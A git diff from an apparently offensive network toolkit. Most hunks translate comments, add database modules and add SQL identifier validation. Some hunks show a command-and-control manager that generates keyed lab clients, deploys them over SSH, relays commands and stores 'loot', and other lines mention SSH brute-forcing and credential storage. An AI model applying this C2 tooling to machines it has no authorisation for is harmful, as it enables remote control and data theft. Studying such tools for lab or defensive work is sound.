||||
try:
|
||||
return Path(sd_dir)
|
||||
except Exception:
|
||||
pass # garde un fallback propre
|
||||
pass # clean fallback
|
||||
|
||||
env_dir = os.getenv("BJORN_DATA_DIR")
|
||||
if env_dir:
|
||||
@@ -63,22 +57,20 @@ def _resolve_data_root() -> Path:
|
||||
|
||||
DATA_ROOT: Path = _resolve_data_root()
|
||||
|
||||
# Sous-dossiers C2
|
||||
# C2 subdirectories
|
||||
DATA_DIR: Path = DATA_ROOT / "c2_data"
|
||||
LOOT_DIR: Path = DATA_DIR / "loot"
|
||||
CLIENTS_DIR: Path = DATA_DIR / "clients"
|
||||
LOGS_DIR: Path = DATA_DIR / "logs"
|
||||
|
||||
# Timings
|
||||
HEARTBEAT_INTERVAL: int = 20 # secondes
|
||||
HEARTBEAT_INTERVAL: int = 20 # seconds
|
||||
OFFLINE_THRESHOLD: int = HEARTBEAT_INTERVAL * 3 # 60s sans heartbeat
|
||||
|
||||
# Création arborescence (idempotente) — OK à l'import, coût faible
|
||||
# Create directory tree (idempotent) - safe at import time, low cost
|
||||
for directory in (DATA_DIR, LOOT_DIR, CLIENTS_DIR, LOGS_DIR):
|
||||
directory.mkdir(parents=True, exist_ok=True)
|
||||
|
||||
# (Optionnel) Prépare un logger si besoin tout de suite
|
||||
# logger = Logger("c2_manager").get_logger()
|
||||
|
||||
|
||||
|
||||
@@ -137,7 +129,7 @@ class EventBus:
|
||||
# ============= Client Templates =============
|
||||
CLIENT_TEMPLATES = {
|
||||
'universal': Template(r"""#!/usr/bin/env python3
|
||||
# Lab client (Zombieland) — use only in controlled environments
|
||||
# Lab client (Zombieland) - use only in controlled environments
|
||||
import socket, json, os, platform, subprocess, threading, time, base64, struct, sys
|
||||
from pathlib import Path
|
||||
|
||||
@@ -924,7 +916,7 @@ class C2Manager:
|
||||
lab_user: str = "testuser", lab_password: str = "testpass") -> dict:
|
||||
"""Generate new client script"""
|
||||
try:
|
||||
# Generate Fernet key (base64) and l'enregistrer en DB (rotation si besoin)
|
||||
# Generate Fernet key (base64) and store in DB (rotate if existing)
|
||||
key_b64 = Fernet.generate_key().decode()
|
||||
if self.db.get_active_key(client_id):
|
||||
self.db.rotate_key(client_id, key_b64)
|
||||
@@ -969,7 +961,7 @@ class C2Manager:
|
||||
ssh_pass: str, **kwargs) -> dict:
|
||||
"""Deploy client via SSH"""
|
||||
try:
|
||||
# S'assurer qu'une clé active existe (sinon générer le client)
|
||||
# Ensure an active key exists (generate client otherwise)
|
||||
if not self.db.get_active_key(client_id):
|
||||
result = self.generate_client(
|
||||
client_id,
|
||||
@@ -1028,7 +1020,7 @@ class C2Manager:
|
||||
if client_id in self._clients:
|
||||
self._disconnect_client(client_id)
|
||||
|
||||
# Révoquer les clés actives en DB
|
||||
# Revoke active keys in DB
|
||||
try:
|
||||
self.db.revoke_keys(client_id)
|
||||
except Exception as e:
|
||||
@@ -1095,7 +1087,7 @@ class C2Manager:
|
||||
|
||||
client_id = client_id_bytes.decode().strip()
|
||||
|
||||
# Récupérer la clé active depuis la DB
|
||||
# Retrieve the active key from DB
|
||||
active_key = self.db.get_active_key(client_id)
|
||||
if not active_key:
|
||||
self.logger.warning(f"Unknown client or no active key: {client_id} from {addr[0]}")
|
||||
@@ -1163,7 +1155,7 @@ class C2Manager:
|
||||
break
|
||||
self._process_client_message(client_id, data)
|
||||
except OSError as e:
|
||||
# socket fermé (remove_client) → on sort sans bruit
|
||||
# Socket closed (remove_client) - exit silently
|
||||
break
|
||||
except Exception as e:
|
||||
self.logger.error(f"Client loop error for {client_id}: {e}")
|
||||
@@ -1248,13 +1240,13 @@ class C2Manager:
|
||||
self._handle_loot(client_id, data['download'])
|
||||
|
||||
elif 'result' in data:
|
||||
# >>> ici on enregistre avec la vraie commande
|
||||
# Store result with the actual command
|
||||
self.db.save_command(client_id, last_cmd or '<unknown>', result, True)
|
||||
self.bus.emit({"type": "console", "target": client_id, "text": str(result), "kind": "RX"})
|
||||
|
||||
elif 'error' in data:
|
||||
error = data['error']
|
||||
# >>> idem pour error
|
||||
# Same for errors
|
||||
self.db.save_command(client_id, last_cmd or '<unknown>', error, False)
|
||||
self.bus.emit({"type": "console", "target": client_id, "text": f"ERROR: {error}", "kind": "RX"})
|
||||
|
||||
@@ -1308,10 +1300,10 @@ class C2Manager:
|
||||
with self._lock:
|
||||
client = self._clients.get(client_id)
|
||||
if client:
|
||||
# signale aux boucles de s'arrêter proprement
|
||||
# Signal loops to stop cleanly
|
||||
client['info']['closing'] = True
|
||||
|
||||
# fermer proprement le socket
|
||||
# Cleanly close the socket
|
||||
try:
|
||||
client['sock'].shutdown(socket.SHUT_RDWR)
|
||||
except Exception:
|
||||
|
||||
98
comment.py
98
comment.py
@@ -1,8 +1,4 @@
|
||||
# comment.py
|
||||
# Comments manager with database backend
|
||||
# Provides contextual messages for display with timing control and multilingual support.
|
||||
# comment = ai.get_comment("SSHBruteforce", params={"user": "pi", "ip": "192.168.0.12"})
|
||||
# Avec un texte DB du style: "Trying {user}@{ip} over SSH..."
|
||||
"""comment.py - Contextual display messages with DB-backed templates and i18n support."""
|
||||
|
||||
import os
|
||||
import time
|
||||
@@ -154,35 +150,42 @@ class CommentAI:
|
||||
# --- Bootstrapping DB -----------------------------------------------------
|
||||
|
||||
def _ensure_comments_loaded(self):
|
||||
"""Ensure comments are present in DB; import JSON if empty."""
|
||||
try:
|
||||
comment_count = int(self.shared_data.db.count_comments())
|
||||
except Exception as e:
|
||||
logger.error(f"Database error counting comments: {e}")
|
||||
comment_count = 0
|
||||
"""Import all comments.*.json files on every startup (dedup via UNIQUE index)."""
|
||||
import glob as _glob
|
||||
|
||||
if comment_count > 0:
|
||||
logger.debug(f"Comments already in database: {comment_count}")
|
||||
default_dir = getattr(self.shared_data, "default_comments_dir", "") or ""
|
||||
if not default_dir or not os.path.isdir(default_dir):
|
||||
logger.debug("No default_comments_dir, seeding minimal fallback set")
|
||||
self._seed_minimal_comments()
|
||||
return
|
||||
|
||||
# Glob all comments JSON files: comments.en.json, comments.fr.json, etc.
|
||||
pattern = os.path.join(default_dir, "comments.*.json")
|
||||
json_files = sorted(_glob.glob(pattern))
|
||||
|
||||
# Also check for a bare comments.json
|
||||
bare = os.path.join(default_dir, "comments.json")
|
||||
if os.path.exists(bare) and bare not in json_files:
|
||||
json_files.insert(0, bare)
|
||||
|
||||
imported = 0
|
||||
for lang in self._lang_priority():
|
||||
for json_path in self._get_comments_json_paths(lang):
|
||||
if os.path.exists(json_path):
|
||||
try:
|
||||
count = int(self.shared_data.db.import_comments_from_json(json_path))
|
||||
imported += count
|
||||
if count > 0:
|
||||
logger.info(f"Imported {count} comments (auto-detected lang) from {json_path}")
|
||||
break # stop at first successful import
|
||||
except Exception as e:
|
||||
logger.error(f"Failed to import comments from {json_path}: {e}")
|
||||
if imported > 0:
|
||||
break
|
||||
for json_path in json_files:
|
||||
try:
|
||||
count = int(self.shared_data.db.import_comments_from_json(json_path))
|
||||
imported += count
|
||||
if count > 0:
|
||||
logger.info(f"Imported {count} comments from {json_path}")
|
||||
except Exception as e:
|
||||
logger.error(f"Failed to import comments from {json_path}: {e}")
|
||||
|
||||
if imported == 0:
|
||||
logger.debug("No comments imported, seeding minimal fallback set")
|
||||
self._seed_minimal_comments()
|
||||
# Nothing new imported - check if DB is empty and seed fallback
|
||||
try:
|
||||
if int(self.shared_data.db.count_comments()) == 0:
|
||||
logger.debug("No comments in DB, seeding minimal fallback set")
|
||||
self._seed_minimal_comments()
|
||||
except Exception:
|
||||
self._seed_minimal_comments()
|
||||
|
||||
|
||||
def _seed_minimal_comments(self):
|
||||
@@ -319,6 +322,9 @@ class CommentAI:
|
||||
"""
|
||||
Return a comment if status changed or delay expired.
|
||||
|
||||
When llm_comments_enabled=True in config, tries LLM first;
|
||||
falls back to the database/template system on any failure.
|
||||
|
||||
Args:
|
||||
status: logical status name (e.g., "IDLE", "SSHBruteforce", "NetworkScanner").
|
||||
lang: language override (e.g., "fr"); if None, auto priority is used.
|
||||
@@ -331,14 +337,36 @@ class CommentAI:
|
||||
status = status or "IDLE"
|
||||
|
||||
status_changed = (status != self.last_status)
|
||||
if status_changed or (current_time - self.last_comment_time >= self.comment_delay):
|
||||
if not status_changed and (current_time - self.last_comment_time < self.comment_delay):
|
||||
return None
|
||||
|
||||
# --- Try LLM if enabled ---
|
||||
text: Optional[str] = None
|
||||
llm_generated = False
|
||||
if getattr(self.shared_data, "llm_comments_enabled", False):
|
||||
try:
|
||||
from llm_bridge import LLMBridge
|
||||
text = LLMBridge().generate_comment(status, params)
|
||||
if text:
|
||||
llm_generated = True
|
||||
except Exception as e:
|
||||
logger.debug(f"LLM comment failed, using fallback: {e}")
|
||||
|
||||
# --- Fallback: database / template system (original behaviour) ---
|
||||
if not text:
|
||||
text = self._pick_text(status, lang, params)
|
||||
if text:
|
||||
self.last_status = status
|
||||
self.last_comment_time = current_time
|
||||
self.comment_delay = self._new_delay()
|
||||
logger.debug(f"Next comment delay: {self.comment_delay}s")
|
||||
return text
|
||||
|
||||
if text:
|
||||
self.last_status = status
|
||||
self.last_comment_time = current_time
|
||||
self.comment_delay = self._new_delay()
|
||||
logger.debug(f"Next comment delay: {self.comment_delay}s")
|
||||
# Log comments
|
||||
if llm_generated:
|
||||
logger.info(f"[LLM_COMMENT] ({status}) {text}")
|
||||
else:
|
||||
logger.info(f"[COMMENT] ({status}) {text}")
|
||||
return text
|
||||
return None
|
||||
|
||||
|
||||
|
||||
@@ -1,21 +1,4 @@
|
||||
"""
|
||||
data_consolidator.py - Data Consolidation Engine for Deep Learning
|
||||
═══════════════════════════════════════════════════════════════════════════
|
||||
|
||||
Purpose:
|
||||
Consolidate logged features into training-ready datasets.
|
||||
Prepare data exports for deep learning on external PC.
|
||||
|
||||
Features:
|
||||
- Aggregate features across time windows
|
||||
- Compute statistical features
|
||||
- Create feature vectors for neural networks
|
||||
- Export in formats ready for TensorFlow/PyTorch
|
||||
- Incremental consolidation (low memory footprint)
|
||||
|
||||
Author: Bjorn Team
|
||||
Version: 2.0.0
|
||||
"""
|
||||
"""data_consolidator.py - Aggregate logged features into training-ready datasets for export."""
|
||||
|
||||
import json
|
||||
import csv
|
||||
@@ -195,7 +178,7 @@ class DataConsolidator:
|
||||
Computes statistical features and feature vectors.
|
||||
"""
|
||||
try:
|
||||
# Parse JSON fields once — reused by _build_feature_vector to avoid double-parsing
|
||||
# Parse JSON fields once - reused by _build_feature_vector to avoid double-parsing
|
||||
host_features = json.loads(record.get('host_features', '{}'))
|
||||
network_features = json.loads(record.get('network_features', '{}'))
|
||||
temporal_features = json.loads(record.get('temporal_features', '{}'))
|
||||
@@ -209,7 +192,7 @@ class DataConsolidator:
|
||||
**action_features
|
||||
}
|
||||
|
||||
# Build numerical feature vector — pass already-parsed dicts to avoid re-parsing
|
||||
# Build numerical feature vector - pass already-parsed dicts to avoid re-parsing
|
||||
feature_vector = self._build_feature_vector(
|
||||
host_features, network_features, temporal_features, action_features
|
||||
)
|
||||
@@ -484,7 +467,7 @@ class DataConsolidator:
|
||||
else:
|
||||
raise ValueError(f"Unsupported format: {format}")
|
||||
|
||||
# Free the large records list immediately after export — record_ids is all we still need
|
||||
# Free the large records list immediately after export - record_ids is all we still need
|
||||
del records
|
||||
|
||||
# AI-01: Write feature manifest with variance-filtered feature names
|
||||
|
||||
50
database.py
50
database.py
@@ -1,6 +1,4 @@
|
||||
# database.py
|
||||
# Main database facade - delegates to specialized modules in db_utils/
|
||||
# Maintains backward compatibility with existing code
|
||||
"""database.py - Main database facade, delegates to specialized modules in db_utils/."""
|
||||
|
||||
import os
|
||||
from typing import Any, Dict, Iterable, List, Optional, Tuple
|
||||
@@ -29,6 +27,9 @@ from db_utils.webenum import WebEnumOps
|
||||
from db_utils.sentinel import SentinelOps
|
||||
from db_utils.bifrost import BifrostOps
|
||||
from db_utils.loki import LokiOps
|
||||
from db_utils.schedules import ScheduleOps
|
||||
from db_utils.packages import PackageOps
|
||||
from db_utils.plugins import PluginOps
|
||||
|
||||
logger = Logger(name="database.py", level=logging.DEBUG)
|
||||
|
||||
@@ -67,6 +68,9 @@ class BjornDatabase:
|
||||
self._sentinel = SentinelOps(self._base)
|
||||
self._bifrost = BifrostOps(self._base)
|
||||
self._loki = LokiOps(self._base)
|
||||
self._schedules = ScheduleOps(self._base)
|
||||
self._packages = PackageOps(self._base)
|
||||
self._plugins = PluginOps(self._base)
|
||||
|
||||
# Ensure schema is created
|
||||
self.ensure_schema()
|
||||
@@ -147,6 +151,9 @@ class BjornDatabase:
|
||||
self._sentinel.create_tables()
|
||||
self._bifrost.create_tables()
|
||||
self._loki.create_tables()
|
||||
self._schedules.create_tables()
|
||||
self._packages.create_tables()
|
||||
self._plugins.create_tables()
|
||||
|
||||
# Initialize stats singleton
|
||||
self._stats.ensure_stats_initialized()
|
||||
@@ -392,6 +399,43 @@ class BjornDatabase:
|
||||
def delete_script(self, name: str) -> None:
|
||||
return self._scripts.delete_script(name)
|
||||
|
||||
# Schedule operations
|
||||
def add_schedule(self, *a, **kw): return self._schedules.add_schedule(*a, **kw)
|
||||
def update_schedule(self, *a, **kw): return self._schedules.update_schedule(*a, **kw)
|
||||
def delete_schedule(self, *a, **kw): return self._schedules.delete_schedule(*a, **kw)
|
||||
def list_schedules(self, *a, **kw): return self._schedules.list_schedules(*a, **kw)
|
||||
def get_schedule(self, *a, **kw): return self._schedules.get_schedule(*a, **kw)
|
||||
def get_due_schedules(self): return self._schedules.get_due_schedules()
|
||||
def mark_schedule_run(self, *a, **kw): return self._schedules.mark_schedule_run(*a, **kw)
|
||||
def toggle_schedule(self, *a, **kw): return self._schedules.toggle_schedule(*a, **kw)
|
||||
|
||||
# Trigger operations
|
||||
def add_trigger(self, *a, **kw): return self._schedules.add_trigger(*a, **kw)
|
||||
def update_trigger(self, *a, **kw): return self._schedules.update_trigger(*a, **kw)
|
||||
def delete_trigger(self, *a, **kw): return self._schedules.delete_trigger(*a, **kw)
|
||||
def list_triggers(self, *a, **kw): return self._schedules.list_triggers(*a, **kw)
|
||||
def get_trigger(self, *a, **kw): return self._schedules.get_trigger(*a, **kw)
|
||||
def get_active_triggers(self): return self._schedules.get_active_triggers()
|
||||
def mark_trigger_fired(self, *a, **kw): return self._schedules.mark_trigger_fired(*a, **kw)
|
||||
def is_trigger_on_cooldown(self, *a, **kw): return self._schedules.is_trigger_on_cooldown(*a, **kw)
|
||||
|
||||
# Package operations
|
||||
def add_package(self, *a, **kw): return self._packages.add_package(*a, **kw)
|
||||
def remove_package(self, *a, **kw): return self._packages.remove_package(*a, **kw)
|
||||
def list_packages(self): return self._packages.list_packages()
|
||||
def get_package(self, *a, **kw): return self._packages.get_package(*a, **kw)
|
||||
|
||||
# Plugin operations
|
||||
def get_plugin_config(self, *a, **kw): return self._plugins.get_plugin_config(*a, **kw)
|
||||
def save_plugin_config(self, *a, **kw): return self._plugins.save_plugin_config(*a, **kw)
|
||||
def upsert_plugin(self, *a, **kw): return self._plugins.upsert_plugin(*a, **kw)
|
||||
def delete_plugin(self, *a, **kw): return self._plugins.delete_plugin(*a, **kw)
|
||||
def list_plugins_db(self): return self._plugins.list_plugins()
|
||||
def set_plugin_enabled(self, *a, **kw): return self._plugins.set_plugin_enabled(*a, **kw)
|
||||
def set_plugin_hooks(self, *a, **kw): return self._plugins.set_plugin_hooks(*a, **kw)
|
||||
def get_hooks_for_event(self, *a, **kw): return self._plugins.get_hooks_for_event(*a, **kw)
|
||||
def get_hooks_for_plugin(self, *a, **kw): return self._plugins.get_hooks_for_plugin(*a, **kw)
|
||||
|
||||
# Stats operations
|
||||
def get_livestats(self) -> Dict[str, int]:
|
||||
return self._stats.get_livestats()
|
||||
|
||||
@@ -1,5 +1,4 @@
|
||||
# db_utils/__init__.py
|
||||
# Database utilities package
|
||||
"""__init__.py - Database utilities package."""
|
||||
|
||||
from .base import DatabaseBase
|
||||
from .config import ConfigOps
|
||||
@@ -17,6 +16,8 @@ from .comments import CommentOps
|
||||
from .agents import AgentOps
|
||||
from .studio import StudioOps
|
||||
from .webenum import WebEnumOps
|
||||
from .schedules import ScheduleOps
|
||||
from .packages import PackageOps
|
||||
|
||||
__all__ = [
|
||||
'DatabaseBase',
|
||||
@@ -35,4 +36,6 @@ __all__ = [
|
||||
'AgentOps',
|
||||
'StudioOps',
|
||||
'WebEnumOps',
|
||||
'ScheduleOps',
|
||||
'PackageOps',
|
||||
]
|
||||
|
||||
@@ -1,5 +1,4 @@
|
||||
# db_utils/actions.py
|
||||
# Action definition and management operations
|
||||
"""actions.py - Action definition and management operations."""
|
||||
|
||||
import json
|
||||
import sqlite3
|
||||
@@ -256,7 +255,7 @@ class ActionOps:
|
||||
out = []
|
||||
for r in rows:
|
||||
cls = r["b_class"]
|
||||
enabled = int(r["b_enabled"]) # 0 reste 0
|
||||
enabled = int(r["b_enabled"])
|
||||
out.append({
|
||||
"name": cls,
|
||||
"image": f"/actions/actions_icons/{cls}.png",
|
||||
|
||||
@@ -1,5 +1,4 @@
|
||||
# db_utils/agents.py
|
||||
# C2 (Command & Control) agent management operations
|
||||
"""agents.py - C2 agent management operations."""
|
||||
|
||||
import json
|
||||
import os
|
||||
|
||||
@@ -1,5 +1,4 @@
|
||||
# db_utils/backups.py
|
||||
# Backup registry and management operations
|
||||
"""backups.py - Backup registry and management operations."""
|
||||
|
||||
from typing import Any, Dict, List
|
||||
import logging
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
# db_utils/base.py
|
||||
# Base database connection and transaction management
|
||||
"""base.py - Base database connection and transaction management."""
|
||||
|
||||
import re
|
||||
import sqlite3
|
||||
import time
|
||||
from contextlib import contextmanager
|
||||
@@ -12,6 +12,16 @@ from logger import Logger
|
||||
|
||||
logger = Logger(name="db_utils.base", level=logging.DEBUG)
|
||||
|
||||
# Regex for valid SQLite identifiers: alphanumeric + underscore, must start with letter/underscore
|
||||
_SAFE_IDENT_RE = re.compile(r'^[A-Za-z_][A-Za-z0-9_]*$')
|
||||
|
||||
|
||||
def _validate_identifier(name: str, kind: str = "identifier") -> str:
|
||||
"""Validate that a SQL identifier (table/column name) is safe against injection."""
|
||||
if not name or not _SAFE_IDENT_RE.match(name):
|
||||
raise ValueError(f"Invalid SQL {kind}: {name!r}")
|
||||
return name
|
||||
|
||||
|
||||
class DatabaseBase:
|
||||
"""
|
||||
@@ -120,12 +130,15 @@ class DatabaseBase:
|
||||
|
||||
def _column_names(self, table: str) -> List[str]:
|
||||
"""Return a list of column names for a given table (empty if table missing)"""
|
||||
_validate_identifier(table, "table name")
|
||||
with self._cursor() as c:
|
||||
c.execute(f"PRAGMA table_info({table});")
|
||||
return [r[1] for r in c.fetchall()]
|
||||
|
||||
def _ensure_column(self, table: str, column: str, ddl: str) -> None:
|
||||
"""Add a column with the provided DDL if it does not exist yet"""
|
||||
_validate_identifier(table, "table name")
|
||||
_validate_identifier(column, "column name")
|
||||
cols = self._column_names(table) if self._table_exists(table) else []
|
||||
if column not in cols:
|
||||
self.execute(f"ALTER TABLE {table} ADD COLUMN {ddl};")
|
||||
@@ -134,13 +147,15 @@ class DatabaseBase:
|
||||
# MAINTENANCE OPERATIONS
|
||||
# =========================================================================
|
||||
|
||||
_VALID_CHECKPOINT_MODES = {"PASSIVE", "FULL", "RESTART", "TRUNCATE"}
|
||||
|
||||
def checkpoint(self, mode: str = "TRUNCATE") -> Tuple[int, int, int]:
|
||||
"""
|
||||
Force a WAL checkpoint. Returns (busy, log_frames, checkpointed_frames).
|
||||
mode ∈ {PASSIVE, FULL, RESTART, TRUNCATE}
|
||||
"""
|
||||
mode = (mode or "PASSIVE").upper()
|
||||
if mode not in {"PASSIVE", "FULL", "RESTART", "TRUNCATE"}:
|
||||
if mode not in self._VALID_CHECKPOINT_MODES:
|
||||
mode = "PASSIVE"
|
||||
with self._cursor() as c:
|
||||
c.execute(f"PRAGMA wal_checkpoint({mode});")
|
||||
|
||||
@@ -1,6 +1,4 @@
|
||||
"""
|
||||
Bifrost DB operations — networks, handshakes, epochs, activity, peers, plugin data.
|
||||
"""
|
||||
"""bifrost.py - Networks, handshakes, epochs, activity, peers, plugin data."""
|
||||
import logging
|
||||
|
||||
from logger import Logger
|
||||
@@ -89,7 +87,7 @@ class BifrostOps:
|
||||
"ON bifrost_activity(timestamp DESC)"
|
||||
)
|
||||
|
||||
# Peers (mesh networking — Phase 2)
|
||||
# Peers (mesh networking - Phase 2)
|
||||
self.base.execute("""
|
||||
CREATE TABLE IF NOT EXISTS bifrost_peers (
|
||||
peer_id TEXT PRIMARY KEY,
|
||||
|
||||
@@ -1,5 +1,4 @@
|
||||
# db_utils/comments.py
|
||||
# Comment and status message operations
|
||||
"""comments.py - Comment and status message operations."""
|
||||
|
||||
import json
|
||||
import os
|
||||
|
||||
@@ -1,5 +1,4 @@
|
||||
# db_utils/config.py
|
||||
# Configuration management operations
|
||||
"""config.py - Configuration management operations."""
|
||||
|
||||
import json
|
||||
import ast
|
||||
|
||||
@@ -1,5 +1,4 @@
|
||||
# db_utils/credentials.py
|
||||
# Credential storage and management operations
|
||||
"""credentials.py - Credential storage and management operations."""
|
||||
|
||||
import json
|
||||
import sqlite3
|
||||
|
||||
@@ -1,9 +1,9 @@
|
||||
# db_utils/hosts.py
|
||||
# Host and network device management operations
|
||||
"""hosts.py - Host and network device management operations."""
|
||||
|
||||
import time
|
||||
import sqlite3
|
||||
from typing import Any, Dict, Iterable, List, Optional
|
||||
from db_utils.base import _validate_identifier
|
||||
import logging
|
||||
|
||||
from logger import Logger
|
||||
@@ -428,6 +428,7 @@ class HostOps:
|
||||
if tname == 'hosts':
|
||||
continue
|
||||
try:
|
||||
_validate_identifier(tname, "table name")
|
||||
cur.execute(f"PRAGMA table_info({tname})")
|
||||
cols = [r[1].lower() for r in cur.fetchall()]
|
||||
if 'mac_address' in cols:
|
||||
|
||||
@@ -1,6 +1,4 @@
|
||||
"""
|
||||
Loki DB operations — HID scripts and job tracking.
|
||||
"""
|
||||
"""loki.py - HID script and job tracking operations."""
|
||||
import logging
|
||||
|
||||
from logger import Logger
|
||||
|
||||
54
db_utils/packages.py
Normal file
54
db_utils/packages.py
Normal file
@@ -0,0 +1,54 @@
|
||||
"""packages.py - Custom package tracking operations."""
|
||||
|
||||
import logging
|
||||
from typing import Any, Dict, List, Optional
|
||||
|
||||
from logger import Logger
|
||||
|
||||
logger = Logger(name="db_utils.packages", level=logging.DEBUG)
|
||||
|
||||
|
||||
class PackageOps:
|
||||
"""Custom package management operations"""
|
||||
|
||||
def __init__(self, base):
|
||||
self.base = base
|
||||
|
||||
def create_tables(self):
|
||||
"""Create custom_packages table"""
|
||||
self.base.execute("""
|
||||
CREATE TABLE IF NOT EXISTS custom_packages (
|
||||
name TEXT PRIMARY KEY,
|
||||
version TEXT,
|
||||
installed_at TEXT DEFAULT CURRENT_TIMESTAMP,
|
||||
installed_by TEXT DEFAULT 'user'
|
||||
);
|
||||
""")
|
||||
logger.debug("Packages table created/verified")
|
||||
|
||||
# =========================================================================
|
||||
# PACKAGE OPERATIONS
|
||||
# =========================================================================
|
||||
|
||||
def add_package(self, name: str, version: str) -> None:
|
||||
"""Insert or replace a package record"""
|
||||
self.base.execute("""
|
||||
INSERT OR REPLACE INTO custom_packages (name, version)
|
||||
VALUES (?, ?);
|
||||
""", (name, version))
|
||||
|
||||
def remove_package(self, name: str) -> None:
|
||||
"""Delete a package by name"""
|
||||
self.base.execute("DELETE FROM custom_packages WHERE name=?;", (name,))
|
||||
|
||||
def list_packages(self) -> List[Dict[str, Any]]:
|
||||
"""List all tracked packages"""
|
||||
return self.base.query(
|
||||
"SELECT * FROM custom_packages ORDER BY name;"
|
||||
)
|
||||
|
||||
def get_package(self, name: str) -> Optional[Dict[str, Any]]:
|
||||
"""Get a single package by name"""
|
||||
return self.base.query_one(
|
||||
"SELECT * FROM custom_packages WHERE name=?;", (name,)
|
||||
)
|
||||
137
db_utils/plugins.py
Normal file
137
db_utils/plugins.py
Normal file
@@ -0,0 +1,137 @@
|
||||
"""plugins.py - Plugin configuration and hook tracking operations."""
|
||||
|
||||
import json
|
||||
import logging
|
||||
from typing import Any, Dict, List, Optional
|
||||
|
||||
from logger import Logger
|
||||
|
||||
logger = Logger(name="db_utils.plugins", level=logging.DEBUG)
|
||||
|
||||
|
||||
class PluginOps:
|
||||
"""Plugin configuration and hook registration operations."""
|
||||
|
||||
def __init__(self, base):
|
||||
self.base = base
|
||||
|
||||
def create_tables(self):
|
||||
"""Create plugin_configs and plugin_hooks tables."""
|
||||
|
||||
self.base.execute("""
|
||||
CREATE TABLE IF NOT EXISTS plugin_configs (
|
||||
plugin_id TEXT PRIMARY KEY,
|
||||
enabled INTEGER DEFAULT 1,
|
||||
config_json TEXT DEFAULT '{}',
|
||||
meta_json TEXT DEFAULT '{}',
|
||||
installed_at TEXT DEFAULT CURRENT_TIMESTAMP,
|
||||
updated_at TEXT DEFAULT CURRENT_TIMESTAMP
|
||||
);
|
||||
""")
|
||||
|
||||
self.base.execute("""
|
||||
CREATE TABLE IF NOT EXISTS plugin_hooks (
|
||||
id INTEGER PRIMARY KEY AUTOINCREMENT,
|
||||
plugin_id TEXT NOT NULL,
|
||||
hook_name TEXT NOT NULL,
|
||||
UNIQUE(plugin_id, hook_name),
|
||||
FOREIGN KEY (plugin_id) REFERENCES plugin_configs(plugin_id)
|
||||
ON DELETE CASCADE
|
||||
);
|
||||
""")
|
||||
|
||||
self.base.execute(
|
||||
"CREATE INDEX IF NOT EXISTS idx_plugin_hooks_hook "
|
||||
"ON plugin_hooks(hook_name);"
|
||||
)
|
||||
|
||||
logger.debug("Plugin tables created/verified")
|
||||
|
||||
# ── Config CRUD ──────────────────────────────────────────────────
|
||||
|
||||
def get_plugin_config(self, plugin_id: str) -> Optional[Dict[str, Any]]:
|
||||
"""Get plugin config row. Returns dict with parsed config_json and meta."""
|
||||
row = self.base.query_one(
|
||||
"SELECT * FROM plugin_configs WHERE plugin_id=?;", (plugin_id,)
|
||||
)
|
||||
if row:
|
||||
try:
|
||||
row["config"] = json.loads(row.get("config_json") or "{}")
|
||||
except Exception:
|
||||
row["config"] = {}
|
||||
try:
|
||||
row["meta"] = json.loads(row.get("meta_json") or "{}")
|
||||
except Exception:
|
||||
row["meta"] = {}
|
||||
return row
|
||||
|
||||
def save_plugin_config(self, plugin_id: str, config: dict) -> None:
|
||||
"""Update config_json for a plugin."""
|
||||
self.base.execute("""
|
||||
UPDATE plugin_configs
|
||||
SET config_json = ?, updated_at = CURRENT_TIMESTAMP
|
||||
WHERE plugin_id = ?;
|
||||
""", (json.dumps(config, ensure_ascii=False), plugin_id))
|
||||
|
||||
def upsert_plugin(self, plugin_id: str, enabled: int, config: dict, meta: dict) -> None:
|
||||
"""Insert or update a plugin record."""
|
||||
self.base.execute("""
|
||||
INSERT INTO plugin_configs (plugin_id, enabled, config_json, meta_json)
|
||||
VALUES (?, ?, ?, ?)
|
||||
ON CONFLICT(plugin_id) DO UPDATE SET
|
||||
enabled = excluded.enabled,
|
||||
meta_json = excluded.meta_json,
|
||||
updated_at = CURRENT_TIMESTAMP;
|
||||
""", (plugin_id, enabled, json.dumps(config, ensure_ascii=False),
|
||||
json.dumps(meta, ensure_ascii=False)))
|
||||
|
||||
def delete_plugin(self, plugin_id: str) -> None:
|
||||
"""Delete plugin and its hooks (CASCADE)."""
|
||||
self.base.execute("DELETE FROM plugin_configs WHERE plugin_id=?;", (plugin_id,))
|
||||
|
||||
def list_plugins(self) -> List[Dict[str, Any]]:
|
||||
"""List all registered plugins."""
|
||||
rows = self.base.query("SELECT * FROM plugin_configs ORDER BY plugin_id;")
|
||||
for r in rows:
|
||||
try:
|
||||
r["config"] = json.loads(r.get("config_json") or "{}")
|
||||
except Exception:
|
||||
r["config"] = {}
|
||||
try:
|
||||
r["meta"] = json.loads(r.get("meta_json") or "{}")
|
||||
except Exception:
|
||||
r["meta"] = {}
|
||||
return rows
|
||||
|
||||
def set_plugin_enabled(self, plugin_id: str, enabled: bool) -> None:
|
||||
"""Toggle plugin enabled state."""
|
||||
self.base.execute(
|
||||
"UPDATE plugin_configs SET enabled=?, updated_at=CURRENT_TIMESTAMP WHERE plugin_id=?;",
|
||||
(1 if enabled else 0, plugin_id)
|
||||
)
|
||||
|
||||
# ── Hook CRUD ────────────────────────────────────────────────────
|
||||
|
||||
def set_plugin_hooks(self, plugin_id: str, hooks: List[str]) -> None:
|
||||
"""Replace all hooks for a plugin."""
|
||||
with self.base.transaction():
|
||||
self.base.execute("DELETE FROM plugin_hooks WHERE plugin_id=?;", (plugin_id,))
|
||||
for h in hooks:
|
||||
self.base.execute(
|
||||
"INSERT OR IGNORE INTO plugin_hooks(plugin_id, hook_name) VALUES(?,?);",
|
||||
(plugin_id, h)
|
||||
)
|
||||
|
||||
def get_hooks_for_event(self, hook_name: str) -> List[str]:
|
||||
"""Get all plugin_ids subscribed to a given hook."""
|
||||
rows = self.base.query(
|
||||
"SELECT plugin_id FROM plugin_hooks WHERE hook_name=?;", (hook_name,)
|
||||
)
|
||||
return [r["plugin_id"] for r in rows]
|
||||
|
||||
def get_hooks_for_plugin(self, plugin_id: str) -> List[str]:
|
||||
"""Get all hooks a plugin subscribes to."""
|
||||
rows = self.base.query(
|
||||
"SELECT hook_name FROM plugin_hooks WHERE plugin_id=?;", (plugin_id,)
|
||||
)
|
||||
return [r["hook_name"] for r in rows]
|
||||
@@ -1,5 +1,4 @@
|
||||
# db_utils/queue.py
|
||||
# Action queue management operations
|
||||
"""queue.py - Action queue management operations."""
|
||||
|
||||
import json
|
||||
import sqlite3
|
||||
|
||||
244
db_utils/schedules.py
Normal file
244
db_utils/schedules.py
